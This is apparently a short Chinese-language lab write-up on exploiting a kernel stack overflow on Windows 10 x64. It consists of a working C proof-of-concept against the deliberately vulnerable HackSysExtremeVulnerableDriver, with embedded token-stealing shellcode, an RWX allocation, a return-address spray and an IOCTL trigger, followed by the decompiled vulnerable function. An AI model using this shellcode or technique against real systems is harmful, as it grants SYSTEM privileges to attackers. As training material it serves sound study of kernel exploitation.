win-kernel-exp-2

栈溢出在win10x64的讨论

poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>

#include <windows.h>

#define BUFFER_SIZE 4242

int main()
{
    HANDLE hHEVD = NULL;
    LPVOID lpMemory = NULL;
    DWORD bytesReturned = 0;

    int i = 0;
    int shellcodeLength = 62;
    int64_t buffer[BUFFER_SIZE] = {0};

    char shellcode[] =
    // python3 sickle.py -p windows/x64/kernel_token_stealer -f c -m pinpoint

    "\x65\x48\xa1\x88\x01\x00\x00\x00\x00\x00\x00" // movabs rax, qword ptr gs:[0x188]
    "\x48\x8b\x80\xb8\x00\x00\x00"                 // mov rax, qword ptr [rax + 0xb8]
    "\x48\x89\xc1"                                 // mov rcx, rax
    "\xb2\x04"                                     // mov dl, 4
    "\x48\x8b\x80\x48\x04\x00\x00"                 // mov rax, qword ptr [rax + 0x448]
    "\x48\x2d\x48\x04\x00\x00"                     // sub rax, 0x448
    "\x38\x90\x40\x04\x00\x00"                     // cmp byte ptr [rax + 0x440], dl
    "\x75\xeb"                                     // jne 0x1017
    "\x48\x8b\x90\xb8\x04\x00\x00"                 // mov rdx, qword ptr [rax + 0x4b8]
    "\x48\x89\x91\xb8\x04\x00\x00"                 // mov qword ptr [rcx + 0x4b8], rdx

    "\x5d"          // pop rbp
    "\xc2\x08\x00"; // ret 8


    printf("[*] Getting a handle on HEVD\n");

    hHEVD = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver",
                        (GENERIC_READ | GENERIC_WRITE),
                        0x00,
                        NULL,
                        OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL,
                        NULL);

    if (hHEVD == INVALID_HANDLE_VALUE)
    {
        printf("[-] Failed to get a handle on HackSysExtremeVulnerableDriver\n");
        return -1;
    }

    printf("[*] Allocating RWX memory\n");
    lpMemory = VirtualAlloc(NULL,
                            shellcodeLength,
                            (MEM_COMMIT | MEM_RESERVE),
                            PAGE_EXECUTE_READWRITE);

    printf("[*] Copying shellcode into RWX memory\n");
    memcpy(lpMemory, shellcode, shellcodeLength);

    printf("[*] Spraying return address: 0x%p\n", lpMemory);
    for (i = 0; i < 270; i++)
    {
        /* Spray the return address, who cares about accuracy ;) */
        buffer[i] = (int64_t)lpMemory;
    }

    printf("[*] Triggering control code 0x222003\n");
    DeviceIoControl(hHEVD,
                    0x222003,
                    buffer,
                    BUFFER_SIZE,
                    NULL,
                    0x00,
                    &bytesReturned,
                    NULL);
}

触发的函数还是老样子:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
__int64 __fastcall TriggerBufferOverflowStack(void *UserBuffer, size_t Size)
{
  unsigned int KernelBuffer[512]; // [rsp+20h] [rbp-818h] BYREF

  memset(KernelBuffer, 0, sizeof(KernelBuffer));
  ProbeForRead(UserBuffer, 0x800ui64, 1u);
  DbgPrintEx(0x4Du, 3u, "[+] UserBuffer: 0x%p\n", UserBuffer);
  DbgPrintEx(0x4Du, 3u, "[+] UserBuffer Size: 0x%X\n", Size);
  DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer: 0x%p\n", KernelBuffer);
  DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer Size: 0x%X\n", 2048i64);
  DbgPrintEx(0x4Du, 3u, "[+] Triggering Buffer Overflow in Stack\n");
  memmove(KernelBuffer, UserBuffer, Size);
  return 0i64;
}